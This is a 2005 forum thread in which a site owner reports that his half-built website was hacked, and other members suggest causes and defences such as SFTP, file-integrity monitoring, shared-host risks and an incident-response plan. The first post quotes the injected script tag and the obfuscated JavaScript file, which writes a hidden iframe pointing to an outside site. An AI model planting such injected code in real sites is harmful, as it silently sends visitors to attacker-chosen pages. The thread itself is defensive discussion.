Page 1 of 2

Someone's hacked my site! :-(

Posted: Thu Apr 07, 2005 7:33 am
by Chris Corbyn
Someone seems to have hacked into my half built website.... :?

I noticed header errors suddenly appearing and active X warnings so I checked the code and notcied somebody had added

Code: Select all

<script language=javascript src=&quote;/img/java.js&quote;></script>
on the very top line - Thats the reason for the header problem.

Going into my img directory I also find the Java.js file...

Code: Select all

url = &quote;http://www.fotoprofit.com/photo_catalog/index.php&quote;;
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '&quote; FR'+'AMEB'+'ORD'+'ER=&quote;0&quote; WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type=&quote;text/css&quote;>';
asd = '<IF'+'RA'+'ME SRC=&quote;';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval(&quote;window.status='...'&quote;,7);
Not sure anything else has been changed. Why would anybody want to hack into my half built site?

http://www.chriscorbyn.co.uk

I have no obvious way of people gaining access so I just dont get it. Could it be a virus? I'm hosted on pickaweb - a decent, reliable UK hosting company.

Posted: Thu Apr 07, 2005 7:49 am
by CoderGoblin
Getting access to the site could be from a multitude of things e.g, forum signature, email signatures and C.V. Is this also the site you had the old version on ?

When it comes to hacking let's face it, many people don't care what the status of a site is. They often just want to hack. You can be grateful if no damage was done and you have the potential to fix the problem and ensure it doesn't happen again before your site goes live and contains lots of data which may be destroyed/exploited.

The code in question appears to automatically load a page (I would guess a pay per click site where someone is getting payed for directing others to it).

Posted: Thu Apr 07, 2005 7:54 am
by Chris Corbyn
This is all new - nothing from the old site on here.

It's very worrying how somebody has gained access to directly edit my PHP files and upload files to my images directory.

Even though I've fixed the problem, surely if someone's done it one it could keep happening?

What extra measures can I take to prevent this other than having an FTP password (which I am changin as we speak)??? If somebody can FTP to my site they have it all :(

I'm going to have valuable client information stored on a mysql database on here to and if somebody can access my files they can get my mysql UID and PW and do as they wish to it (I keep backups of course).

Posted: Thu Apr 07, 2005 8:29 am
by timvw
i cant understand why people use a broken protocol like ftp..
certainly not when they insist using ssh instead of telnet...

scp/sftp is the way to go :)



might want to check access rights on your files on the webhost too... and check who logged in into your account etc...

Posted: Fri Apr 08, 2005 6:59 am
by Chris Corbyn
timvw wrote:i cant understand why people use a broken protocol like ftp..
certainly not when they insist using ssh instead of telnet...

scp/sftp is the way to go :)



might want to check access rights on your files on the webhost too... and check who logged in into your account etc...
FTP is all I have access to. Not even sure I have SSH access.

I'll have to move hsot if I want to take advantage of ftps, scp etc...

Posted: Sat Apr 09, 2005 1:20 pm
by Ambush Commander
Well... Would CVS help track changes? If they really managed to get access via FTP in order to change your site, a CVS repository would allow you to see discrepancies and roll things back.

Posted: Sat Apr 09, 2005 1:51 pm
by Chris Corbyn
Ambush Commander wrote:Well... Would CVS help track changes? If they really managed to get access via FTP in order to change your site, a CVS repository would allow you to see discrepancies and roll things back.
Hey you know, that's a cool idea. I haven't used CVS before but you got me thinking on a sweet little project here to monitor my websites (based on the latest "official" version), and correct changes. Could be a bonus for clients too if they know I'll be constantly monitoring activity for them 8)

Posted: Sat Apr 09, 2005 4:58 pm
by timvw
actually, i think you are better of with a tool like tripwire


but if you need versioning, cvs can come in handy too.

Posted: Sat Apr 09, 2005 5:01 pm
by infolock
that sucks man. how did they gain access? You don't think they coudl have come in through my subdomain do you?

Posted: Sat Apr 09, 2005 5:09 pm
by Chris Corbyn
infolock wrote:that sucks man. how did they gain access? You don't think they coudl have come in through my subdomain do you?
Nah it was before that dude... sorted now anyway.

I did have mwftp sitting on there dormant (but it still requires a password, just possibly has a security flaw in it). I've deleted it anyway and I'm working on a code change monitor which will run a check by cron every 5 mins and fix any altered code, as well as alerting me asap of the details of the attack. I may post a snippet if it would be useful (got a couple of other things on the go so it may be a while).

I've changed my ftp password too.

Posted: Wed Apr 20, 2005 9:01 pm
by McGruff
Another possibility is the host set up. If you're on a shared host it's often the case that anyone else on the same shared server can read any file on the other sites - including passwords in an .htpasswd file.

Posted: Sat May 28, 2005 5:20 am
by ibolui
McGruff wrote:Another possibility is the host set up. If you're on a shared host it's often the case that anyone else on the same shared server can read any file on the other sites - including passwords in an .htpasswd file.
is there any way to prevent this??
if many people know about this, then wouldnt web hosting companies lose their shared hosting deals?

Posted: Sat May 28, 2005 6:13 am
by JAM
ibolui wrote:
McGruff wrote:Another possibility is the host set up. If you're on a shared host it's often the case that anyone else on the same shared server can read any file on the other sites - including passwords in an .htpasswd file.
is there any way to prevent this??
if many people know about this, then wouldnt web hosting companies lose their shared hosting deals?
I was just to say what McGruff said earlier.

And no. It is solely up to the host admins themselves to secure the serverfarm/box. The users can make it more difficult of course (various of security approaches allready described above) but it all ends on the host's table.

If the host is not secure, nothing is.

I'd report the incident to the host and see if they know something about it. Id the attack was directed ar 100 randomly selected users, there might be several others that still do not know what has happened.
The admin might cover it up not to loose face and then you'll never know. The pro's is that you actually might guide them into something they didn't know and possibly get a discount on the fee's...

Posted: Sat May 28, 2005 9:19 am
by Buddha443556
ibolui wrote:
McGruff wrote:Another possibility is the host set up. If you're on a shared host it's often the case that anyone else on the same shared server can read any file on the other sites - including passwords in an .htpasswd file.
is there any way to prevent this??
if many people know about this, then wouldnt web hosting companies lose their shared hosting deals?
It helps to have a plan for such incidents. Could be as simple as ...

Making sure your own PC is secure - No Trojans stealing passwords. Updating your AV software. Check your host file. Check your Windows registry. Etc. Etc. Once your sure your PC is secure change all account passwords. Notify your host. Do not delete anything the host will need to see it all. Put up an out of service page if necessary or till you can discover the extents of the damage. Now you can begin investigating the incident and repairing the damage in an orderly manor with your host.

Shared hosting is always risky .. but start by checking your own security first.

Having a plan keeps us from making things worse than they are already. :wink:

Posted: Sat May 28, 2005 9:45 am
by timvw
using ftp is as silly as telnetting ;)

at least use sftp, even better use scp (and start using public/private keys)..
might want to restrict access to the ip-range that your ISP owns too..